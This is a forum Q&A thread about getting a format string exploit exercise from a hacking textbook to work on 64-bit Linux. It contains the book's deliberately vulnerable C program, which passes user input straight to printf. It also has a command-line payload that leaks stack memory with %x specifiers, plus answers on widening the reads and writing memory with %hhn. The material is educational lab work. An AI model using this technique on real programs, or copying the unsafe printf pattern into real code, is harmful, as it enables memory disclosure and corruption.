# Format String Vulnerabity

Tags: c, linux, exploit

I am currently reading "Hacking The Art of Exploitation" where it talks about format string vulnerabilities. The book's exercise tries to read the data from arbitrary part of memory by writing an address to stack and read it using format parameters. The problem is the exercise is written for 32 bit systems, whereas I am working on a 64 bit. My attempt to make it work for a 64 bit system is below:

```
./fmt_vuln $(printf "\xaa\xee\xff\xff\xff\x7f")%016x.%016x.%016x.%016x.%016x.%016x.%016x.%016x
```

and the response I get from the shell is:

> The right way to print user-controlled input:
>
> ?????%016x.%016x.%016x.%016x.%016x.%016x.%016x.%016x
>
> The wrong way to
>   print user-controlled input:
>
> 0000000055755010.00000000f7dd18c0.00000000f7af4154.000000000000000.000000000000035.0       ffffe088.00000000555543c0.**00000000ffffeeaa**
>
> [*] test val @ 0x55755010 =
>   -72 0xffffffb8

As you can see I am only able to read the lower 4 bytes (0xFFFFEEAA) and the upper 2 bytes are gone(0x7FFF). Any thought on how I can fix this?

Btw, here is the code for fmt_vuln from the book:

```
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[]) {
   char text[1024];
   static int test_val = -72;

   if(argc < 2) {
      printf("Usage: %s <text to print>\n", argv[0]);
      exit(0);
   }
   strcpy(text, argv[1]);

   printf("The right way to print user-controlled input:\n");
   printf("%s", text);


   printf("\nThe wrong way to print user-controlled input:\n");
   printf(text);

   printf("\n");

   // Debug output
   printf("[*] test_val @ 0x%08x = %d 0x%08x\n", &test_val, test_val, test_val);

   exit(0);
}
```

Here is a screen shot of my shell:
[image]

Comment: Please state the errors. The text on the picture is too small to read. In addition, the text cannot be indexed by search engines for future visitors.

Comment: @jww fixed thank you

Answer (score 1, accepted):

Try reading with `%016llx` (long long x) instead of `%016x`, since you are reading a 64 bit hex, not a 32.

Comment: perfect thanks! Now it is working but it reads 0x30257fffffffeeaa instead of 0x00007fffffffeeaa . Is there a way I can solve that too? Also, would the same technique work for "%s" and "%n" as well?

Comment: For %s you don't need anything, and for %n you can do %hhn in order to overwirte in a 64bit system (where you usually overwrite 1 or 2 bytes at a time). The address is different probably because you don't have the exact padding or maybe you are reading another address which is ASLR and is different everytime.